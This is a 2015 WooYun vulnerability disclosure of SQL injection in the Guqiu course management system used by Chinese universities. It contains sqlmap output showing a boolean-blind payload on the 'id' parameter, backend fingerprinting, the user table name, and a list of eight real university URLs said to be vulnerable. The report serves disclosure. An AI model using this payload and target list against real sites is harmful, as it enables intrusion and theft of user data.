当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107553

漏洞标题:谷秋精品课程管理系统SQL注入

相关厂商:南京深图计算机技术有限公司

漏洞作者: 路人甲

提交时间:2015-04-14 18:27

修复时间:2015-05-29 18:28

公开时间:2015-05-29 18:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

南京深图计算机技术有限公司开发的谷秋精品课程管理系统,大量高校在使用。
http://www.guqiu.com/
#1

http://kc.njnu.edu.cn/rw/system/faq/default.aspx?action=update&id=8


GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] n
sqlmap identified the following injection points with a total of 85 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=update&id=8 AND 5342=5342
---
[00:59:45] [INFO] testing MySQL
[00:59:45] [WARNING] the back-end DBMS is not MySQL
[00:59:45] [INFO] testing Oracle
[00:59:45] [WARNING] the back-end DBMS is not Oracle
[00:59:45] [INFO] testing PostgreSQL
[00:59:45] [WARNING] the back-end DBMS is not PostgreSQL
[00:59:45] [INFO] testing Microsoft SQL Server
[00:59:46] [WARNING] the back-end DBMS is not Microsoft SQL Server
[00:59:46] [INFO] testing SQLite
[00:59:46] [WARNING] the back-end DBMS is not SQLite
[00:59:46] [INFO] testing Microsoft Access
[00:59:46] [INFO] confirming Microsoft Access
[00:59:46] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access


由于是access数据库,试了下sqlmap不能猜解出表名,没有表名就跑不出数据呀,只能去官网下了套源码看了下,发现存储用户数据的表为 C_User

a.jpg


漏洞证明:

其他测试案例:

http://jpkc.cdysxy.com/course/tjtx/system/faq/default.aspx?action=update&id=1
http://jpkc.scjavc.cn/tqd/system/faq/default.aspx?action=update&id=8
http://jpk.mdjnu.cn/course/rjtxjgysj/system/faq/default.aspx?action=update&id=1
http://kjxjp.ycvc.jx.cn/jpkc1/system/faq/default.aspx?action=update&id=1
http://www.lntc.edu.cn/wjhx/system/faq/default.aspx?action=update&id=1
http://course.zcvc.cn/course/xsjy/system/faq/default.aspx?action=update&id=1
http://kc.njnu.edu.cn/rw/system/faq/default.aspx?action=update&id=8
http://221.178.192.197/course/zyfjx/system/faq/default.aspx?action=update&id=1

修复方案:

基本的敏感字符过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝